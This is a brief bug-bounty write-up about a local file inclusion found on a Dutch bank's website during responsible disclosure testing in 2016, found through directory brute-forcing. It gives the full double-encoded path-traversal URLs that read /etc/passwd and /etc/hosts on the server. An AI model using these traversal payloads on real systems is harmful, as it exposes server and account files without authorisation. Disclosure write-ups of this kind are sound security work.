LFI on Netherland Bank

• While testing one of the responsible disclosure bank of Netherlands in 2016 .
• I Started Brutefocing for directories before going to sleep using https://github.com/danielmiessler/SecLists with Burp Intruder.
• I Woke up and Notice :

https://www.site.nl/forms/webresources/25237bdb-6d2862fa/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

With the Response Status Code 200:

• https://www.site.nl/forms/webresources/25237bdb-6d2862fa/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/hosts (Display’s all host information)
• Confirmed and Reported :

25$ Gift card